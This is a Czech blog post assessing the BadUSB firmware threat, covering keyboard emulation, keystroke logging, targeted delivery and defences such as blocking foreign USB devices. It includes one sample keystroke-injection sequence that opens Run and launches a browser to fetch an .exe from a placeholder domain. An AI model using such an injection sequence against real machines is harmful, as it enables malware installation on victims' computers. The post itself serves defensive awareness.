Je BadUSB reálná hrozba nebo jen FUD?

BadUSB

Že je možné změnit firmware jakéhokoliv zařízení, je známá věc. Není tedy nijak překvapující, že je možné změnit i firmware některých USB flash disků, přesto je této skutečnosti věnována nebývalá pozornost.

Je tomu tak proto, že firmware je údajně možno upravit i tak, aby zcela bez vědomí uživatele prováděl na pozadí i jiné operace.

Na první pohled se může zdát, že se jedná jen o bouři ve sklenici vody, protože aby bylo možno tímto způsobem kompromitovat nějaký počítač, muselo by nejprve dojít k připojení takto upravené flashky k počítači, který má být napaden anebo k nahrání nového útočného firmwaru do aktuálně připojené USB flashky na již napadeném počítači, což je ale možné jen v případě, že se jedná o flashku určitého typu, pro který je exploit, a která umožňuje upgrade firmwaru.

Připusťme, že tyto podmínky byly splněny, pak by zcela jistě byla možná modifikace souborů uložených na flash disku, zaregistrování se jako další síťové zařízení a změna konfigurace sítě, zaregistrování se jako další klávesnice a odchytávání stisknutých kláves a následně odesílání sekvence znaků do určitého okna, což by v krajním případě mohlo vést až ke stažení zákeřného malware z internetu, zcizení přihlašovacích údajů nebo jiných citlivých informací, nebo případně narušení integrity dat na napadeném systému.

Ve Windows by se mohlo např. jednat o tuto sekvenci kláves: Win+R, iexplorer http:\\nějaká doména\soubor.exe, Enter, atd. Samozřejmě, že ne v každé verzi to bude fungovat.

Ano, tohle všechno je teoreticky možné, ale uživatel by si toho mohl též všimnout, protože uvidí v systému ikonu nového zařízení a možná i zaznamená, že se něco děje na obrazovce. Ale také nemusí, pokud by např. takto modifikovaný firmware kontroloval stisknuté klávesy, mohl by danou akci provést až v okamžiku, kdy usoudí, že se uživatel od počítače s největší pravděpodobností vzdálil.

Nicméně je zřejmé, že této vlastnosti systému a zranitelnosti konkrétních typ USB flash disků nebude nikdy zneužíváno masově, protože je krajně nepravděpodobné, že by útočník dal do oběhu velké množství USB flash disků, nýbrž že se bude jednat, pokud vůbec, o cílený útok na konkrétní osobu nebo organizaci.

Dostat takto upravenou flashku ke konkrétní osobě nebo firmě je možné za pomocí běžných metod sociálního inženýrství nebo stačí využít skutečnosti, že některé instituce v rámci poskytovaných služeb připojují USB flash disky svých klientů do svých počítačů.

Přes výše uvedené skutečnosti si však nemyslím, že by se jednalo o nějaké vysoké riziko, protože k vytvoření funkčního malwaru namířeného proti konkrétní osobě nebo organizaci nestačí jen modifikovat firmware řadiče určitého USB flash disku, nehledě na to, že zde jsou mnohem jednodušší způsoby, jak získat přihlašovací údaje nebo jiná citlivá data.

Na druhou stranu je nutné připustit, že pokud by k takovému útoku přeci jen došlo, tak antivirus ani personální firewall na stanici nemusí škodlivý kód vůbec detekovat a preventivně blokovat necertifikovaná zařízení není také ve všech případech možné.

Jediným řešením by pak bylo, nepřipojovat k počítači žádné cizí USB zařízení a toto administrativně zakázat, a pokud je to potřeba tak za tímto účelem používat dedikovaný počítač s omezeným přístupem na internet a do vnitřní sítě, což lze snadno realizovat prostřednictvím firewallových pravidel a povolení pouze komunikace IP-to-IP a port-to-port.

Poznámka: Celou tuhle aféru odstartoval Karsten Hohl, který na konferenci BlackHat představil nedetekovatelný malware a korunu tomu nasadili Adam Caudill and Brandon Wilson, kteří svůj kód umožňující změnit firmware USB tchajwanské firmy Phison zveřejnili na Githubu na základě reverzního inženýrství tohoto firmwaru. Oba jsou přesvědčeni, že tím, že kód zveřejnili, udělali prospěšnou věc.


Pokud vás tento příspěvek zaujal, sdílejte ho!
Share on FacebookShare on LinkedInTweet about this on TwitterShare on Google+Email this to someonePrint this page

Štítky:


K článku “Je BadUSB reálná hrozba nebo jen FUD?” se zde nenachází žádný komentář - buďte první.

Diskuse na tomto webu je moderována. Pod článkem budou zobrazovány jen takové komentáře, které nebudou sloužit k propagaci konkrétní firmy, produktu nebo služby. V případě, že chcete, aby z těchto stránek vedl odkaz na váš web, kontaktujte nás, známe efektivnější způsoby propagace.

Přihlášeným uživatelům se tento formulář nezobrazuje - zaregistrujte se.

Jméno:(požadováno)
E-mail:(požadováno - nebude zobrazen)
Web:

Text vaší reakce: